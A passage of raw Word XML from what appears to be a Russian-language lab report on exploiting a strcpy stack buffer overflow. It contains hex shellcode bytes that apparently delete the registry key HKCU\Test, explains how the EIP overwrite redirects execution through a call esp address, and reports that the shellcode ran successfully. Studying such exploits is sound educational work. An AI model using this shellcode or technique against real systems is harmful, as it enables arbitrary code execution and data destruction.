      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xA</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>3\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75\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xFF</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xD</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>3\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xE</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>8\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xEB</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xFF</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xFF</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xFF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52\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47\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>20\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>44\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4</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C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54\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20\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>48\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B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59\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F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43\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>55\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>52\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>52\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4</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E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54\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F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55\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>53\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>45\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>52\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C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54\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>65\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>73\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>74\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>20\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F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76\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>20\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>74\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>65\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>73\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>74\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>20\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>66</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00950618">
        <w:t>код</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00950618">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00950618">
        <w:t>удаления</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00950618">
        <w:t>ключа</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00950618">
        <w:t>реестра</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKCU</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E32B01" w14:textId="77777777" w:rsidR="00950618" w:rsidRDefault="00FD4B58" w:rsidP="00950618">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:keepNext/>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="051A1787" wp14:editId="72A5109A">
            <wp:extent cx="5789991" cy="1073150"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="48125219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219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5021" cy="10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9E71" w14:textId="1B917059" w:rsidR="00FD4B58" w:rsidRDefault="00950618" w:rsidP="003018D3">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950618">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00950618">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00950618">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00950618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10</w:t>
      </w:r>
      <w:r w:rsidRPr="00950618">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00950618">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - вредоносная строка</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2E7928" w14:textId="490C80F3" w:rsidR="003018D3" w:rsidRDefault="003018D3" w:rsidP="003018D3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Уязвимость</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">копирует данные без проверки длину, что приводит к переполнению буфера </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и перезаписи адреса возврата. Механизм атаки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1042E15F" w14:textId="784D9C2D" w:rsidR="003018D3" w:rsidRPr="003018D3" w:rsidRDefault="003018D3" w:rsidP="003018D3">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>заполнение буфера</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>первые 16 байт (</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve">66) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">заполняют </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003018D3">
        <w:t>12]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и часть стека</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA137D" w14:textId="5C2AAECE" w:rsidR="003018D3" w:rsidRPr="003018D3" w:rsidRDefault="003018D3" w:rsidP="003018D3">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">перезапись </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>адрес</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t>7628</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AC</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t>49</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (инструкция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>записывается вместо оригинального адреса возврата</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B92FA87" w14:textId="35B5D460" w:rsidR="003018D3" w:rsidRPr="003018D3" w:rsidRDefault="003018D3" w:rsidP="003018D3">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>выполнение шелл-кода</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">после перезаписи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">управление передается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r>
        <w:t>, который выполняет шелл-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>код,  расположенный</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> в стеке</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC7357C" w14:textId="600FB4F5" w:rsidR="003018D3" w:rsidRPr="003018D3" w:rsidRDefault="003018D3" w:rsidP="002A5C55">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>результат</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">шелл-код удаляет ключ реестра </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKCU</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">с параметрами </w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEF94F3" w14:textId="77777777" w:rsidR="003018D3" w:rsidRDefault="00FD4B58" w:rsidP="003018D3">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79AABBE4" wp14:editId="2CB5411C">
            <wp:extent cx="5384800" cy="1644964"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1744785641" name="Рисунок 1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5641" name="Рисунок 1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39" cy="16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F81" w14:textId="038224D5" w:rsidR="00FD4B58" w:rsidRDefault="003018D3" w:rsidP="003018D3">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003018D3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003018D3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11</w:t>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003018D3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - эксплуатация переполнения буфера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351161F0" w14:textId="31978AF7" w:rsidR="003018D3" w:rsidRDefault="003018D3" w:rsidP="003018D3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Результат работы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288F855C" w14:textId="3EED109F" w:rsidR="003018D3" w:rsidRDefault="00F84BA8" w:rsidP="00F84BA8">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>При запуске программы заметно, что помимо символов «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00F84BA8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>есть еще текст, а также надпись «Операция успешно завершена»</w:t>
      </w:r>
      <w:r w:rsidR="00AB6341">
        <w:t>. Это означает, то, что шелл-код был успешно перенесен и исполнен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235552A3" w14:textId="77777777" w:rsidR="00817816" w:rsidRDefault="00817816" w:rsidP="00817816">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BD1DB3C" wp14:editId="3105E0C5">
            <wp:extent cx="3730458" cy="771690"/>
            <wp:effectExtent l="0" t="0" r="3810" b="9525"/>
            <wp:docPr id="97368837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837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9"/>
                    <a:srcRect b="53214"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3757153" cy="777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EE598" w14:textId="48CA9C62" w:rsidR="00817816" w:rsidRDefault="00817816" w:rsidP="00817816">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00817816">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - вывод уязвимой программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D47C60A" w14:textId="77777777" w:rsidR="00817816" w:rsidRPr="00817816" w:rsidRDefault="00817816" w:rsidP="00817816">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161F5861" w14:textId="77777777" w:rsidR="00AB6341" w:rsidRDefault="00AB6341" w:rsidP="00AB6341">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DDB7AA2" wp14:editId="70109AF0">
            <wp:extent cx="3402108" cy="1713054"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
            <wp:docPr id="66767758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758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626" cy="17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8AAE" w14:textId="4CD9D485" w:rsidR="00AB6341" w:rsidRPr="00AB6341" w:rsidRDefault="00AB6341" w:rsidP="00AB6341">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
